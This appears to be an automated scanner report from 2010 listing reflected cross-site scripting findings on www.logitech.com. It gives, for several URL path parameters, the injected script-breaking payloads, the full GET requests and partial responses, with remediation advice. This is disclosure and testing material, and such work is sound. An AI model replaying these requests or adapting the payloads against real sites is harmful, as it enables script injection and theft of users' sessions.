HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dad11"%3bedb032062d1 was submitted in the REST URL parameter 1. This input was echoed as dad11";edb032062d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usdad11"%3bedb032062d1/478/3525 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7c37</script><script>alert(1)</script>06169bb90c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478f7c37</script><script>alert(1)</script>06169bb90c7/3525 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 638ca"><script>alert(1)</script>2c8a78f9635 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478638ca"><script>alert(1)</script>2c8a78f9635/3525 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab686"><script>alert(1)</script>f0f1439994b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3525ab686"><script>alert(1)</script>f0f1439994b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f655</script><script>alert(1)</script>c29f78eaa24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/35255f655</script><script>alert(1)</script>c29f78eaa24 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9addb"><script>alert(1)</script>11d20180dfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us9addb"><script>alert(1)</script>11d20180dfe/478/3881 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248c8"%3b174ba05b1b was submitted in the REST URL parameter 1. This input was echoed as 248c8";174ba05b1b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us248c8"%3b174ba05b1b/478/3881 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99b14</script><script>alert(1)</script>4d9c1a3a08c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /99b14</script><script>alert(1)</script>4d9c1a3a08c/478/3881 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5352"><script>alert(1)</script>d59ddd9f76e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478e5352"><script>alert(1)</script>d59ddd9f76e/3881 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd0ae</script><script>alert(1)</script>5242373aef8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478dd0ae</script><script>alert(1)</script>5242373aef8/3881 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 699cc"><script>alert(1)</script>5c1fb42c556 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/3881699cc"><script>alert(1)</script>5c1fb42c556 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf0f</script><script>alert(1)</script>e811ca79601 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/3881acf0f</script><script>alert(1)</script>e811ca79601 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c506c"><script>alert(1)</script>bec0bb36fd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usc506c"><script>alert(1)</script>bec0bb36fd3/478/4026 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9e54"%3ba6824afe78d was submitted in the REST URL parameter 1. This input was echoed as e9e54";a6824afe78d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-use9e54"%3ba6824afe78d/478/4026 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b0f9</script><script>alert(1)</script>862eb69bf30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1b0f9</script><script>alert(1)</script>862eb69bf30/478/4026 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97ffd"><script>alert(1)</script>ce29f220b94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/47897ffd"><script>alert(1)</script>ce29f220b94/4026 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4078f</script><script>alert(1)</script>aba5ef3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/4784078f</script><script>alert(1)</script>aba5ef3db/4026 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85088</script><script>alert(1)</script>d089235d00d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/478/402685088</script><script>alert(1)</script>d089235d00d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9496"><script>alert(1)</script>0d90a6e6337 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/478/4026e9496"><script>alert(1)</script>0d90a6e6337 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b04"><script>alert(1)</script>805db76006b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf9b04"><script>alert(1)</script>805db76006b/682/7626 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ac4</script><script>alert(1)</script>3a9c71b05db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /23ac4</script><script>alert(1)</script>3a9c71b05db/682/7626 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c129"%3b32afe2526ba was submitted in the REST URL parameter 1. This input was echoed as 2c129";32afe2526ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us2c129"%3b32afe2526ba/682/7626 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46ef3"><script>alert(1)</script>056088f4509 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/68246ef3"><script>alert(1)</script>056088f4509/7626 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b33e</script><script>alert(1)</script>210bc20cc2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/6822b33e</script><script>alert(1)</script>210bc20cc2b/7626 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab3ee</script><script>alert(1)</script>08f89f11bf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/682/7626ab3ee</script><script>alert(1)</script>08f89f11bf8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6569"><script>alert(1)</script>1079d78b9b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/682/7626c6569"><script>alert(1)</script>1079d78b9b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f988"><script>alert(1)</script>5b3c5cda13c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us7f988"><script>alert(1)</script>5b3c5cda13c/69/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc3ea</script><script>alert(1)</script>45644b47ff3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
